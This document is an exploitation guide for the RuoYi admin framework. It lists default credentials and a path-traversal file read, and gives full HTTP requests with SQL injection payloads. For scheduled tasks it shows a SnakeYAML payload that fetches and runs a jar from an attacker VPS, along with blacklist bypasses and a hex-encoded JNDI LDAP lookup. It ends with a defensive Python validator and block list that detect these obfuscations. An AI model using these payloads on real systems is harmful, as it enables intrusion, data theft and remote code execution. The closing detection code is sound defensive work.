RuoYi vulnerability exploitation
1. RuoYi default credentials
admin/admin123
ruoyi/123456
2. Front-end Shiro deserialization
The version is too old to be exploitable in practice; using a deserialization tool is not covered further here.
3. Arbitrary file read, RuoYi < 4.5.1
GET /common/download/resource?resource=/profile/../../../../../../../(unknown)
4. SQL injection
4-1. /system/role/list path
POST form:
POST /system/role/list HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 181
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/system/role
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
GET form:
GET /system/role/list?pageSize=10&pageNum=1&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=&params%5BdataScope%5D=and+extractvalue(1,concat(0x7e,(select+database()),0x7e)) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 181
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/system/role
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
4-2. /system/dept/list path
POST /system/dept/list HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Connection: keep-alive
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Cookie:
sec-ch-ua-mobile: ?0
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Length: 0
params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
5. Scheduled tasks
5-1. Exploiting unrestricted scheduled tasks
After setting up the exploit on your VPS, create a new task on the scheduled-task page:
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps地址/yaml-payload.jar"]]]]')
0/10 * * * * ?
5-2. Blacklist on the invocation string
Scheduled tasks block ldap remote calls
Scheduled tasks block http(s) remote calls
Scheduled tasks block rmi remote calls
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["h't't'p'://vps地址/yaml-payload.jar"]]]]')
0/10 * * * * ?
5-3. Whitelist restriction on callable classes
Use the genTableServiceImpl.createTable method to change invoke_target to a JNDI payload.
Exploitation:
Create a new scheduled task:
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'NILF' WHERE job_id = 1;')
0/10 * * * * ?
If the "invoke target string" of the job with job_id 1 now reads NILF, the vulnerability exists and can be exploited further. The actual attack payload is:
genTableServiceImpl.createTable("UPDATE sys_job SET invoke_target = \"javax.naming.InitialContext.lookup('ldap://ip:端口/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')\" WHERE job_id = 1;")
JNDI is usually disabled, however, so the value (javax.naming.InitialContext.lookup('ldap://ip:端口/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')) is converted to hexadecimal to bypass the blacklist. The final payload is:
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f3139322e3136382e34342e38343a313338392f446573657269616c697a6174696f6e2f55524c444e532f656b777a6d787479696d2e64677268332e636e2729 WHERE job_id = 1;')
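Sections 5-2 and 5-3 show that a substring blacklist on the job invoke target is defeated by splitting the scheme with quotes (h't't'p) and by hex-encoding the value. The validator below is an added example from the defender's side, not RuoYi's own code: it normalizes both obfuscations before matching and additionally enforces a bean allow list; the token list and the allowed bean name ryTask are constructed for the demo.

```python
import re

# Constructed block list, modelled on the categories the page says the
# scheduler blocks (ldap, http(s), rmi) plus the JNDI and SnakeYAML entry
# points the payloads above rely on.
BLOCKED_TOKENS = ("ldap://", "http://", "https://", "rmi://",
                  "javax.naming", "snakeyaml", "scriptenginemanager")
# Hypothetical allow list of Spring bean names a job may invoke.
ALLOWED_BEANS = {"ryTask"}
# SQL-style hex literal such as the 0x6a6176... value used in section 5-3.
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
# Straight and curly quote characters used for the h't't'p splitting trick.
QUOTES = re.compile("[\'\"`\u2018\u2019\u201c\u201d]")


def normalize(target: str) -> str:
    """Undo the page's two obfuscations before matching: decode even-length
    ASCII hex literals (0x6c6461703a2f2f -> ldap://), drop every quote
    character (h't't'p -> http), then lower-case for a case-insensitive match."""
    def decode(match: re.Match) -> str:
        digits = match.group(1)
        if len(digits) % 2:
            return match.group(0)  # odd length: not a byte string, leave as is
        try:
            return bytes.fromhex(digits).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return match.group(0)  # binary payload: leave as is, still visible
    return QUOTES.sub("", HEX_LITERAL.sub(decode, target)).lower()


def check_invoke_target(target: str) -> list:
    """Return the reasons to reject a job invoke target; [] means accept.
    A token found only after normalization is reported as 'obfuscated', which
    is exactly what a naive substring blacklist misses."""
    reasons = []
    raw, norm = target.lower(), normalize(target)
    for token in BLOCKED_TOKENS:
        if token in norm:
            how = "plain" if token in raw else "obfuscated"
            reasons.append(f"{how} blocked token {token!r}")
    # The bean is everything before the first '.' or '(' (e.g. genTableServiceImpl).
    bean = re.split(r"[.(]", target.strip(), maxsplit=1)[0]
    if bean not in ALLOWED_BEANS:
        reasons.append(f"bean {bean!r} not on allow list")
    return reasons
```

The same normalization can be run over existing sys_job rows or the job audit log to flag tasks whose invoke_target was already rewritten, as in the 5-3 scenario.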